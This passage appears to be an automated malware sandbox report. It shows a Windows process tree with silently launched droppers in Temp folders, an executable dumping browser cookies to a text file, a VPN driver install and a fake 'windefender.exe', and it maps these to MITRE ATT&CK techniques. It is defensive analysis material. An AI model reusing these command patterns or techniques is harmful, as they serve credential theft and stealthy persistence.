"C:\Users\Admin\AppData\Local\Temp\is-HBSJU.tmp\zznote.tmp" /SL5="$601A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\zznote.exe" /Verysilent
5⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\is-GHUBQ.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-GHUBQ.tmp\jg4_4jaa.exe" /silent
6⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\hjjgaa.exe" /Verysilent
4⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:2068

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:5472

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{01c7bc50-d236-5c4a-938b-39339716c632}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:4688

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
2⤵
PID:5932

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5028

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:4260

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:6072

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6216

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:5836

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3076

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6028

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery

Security Software Discovery

T1063

Peripheral Device Discovery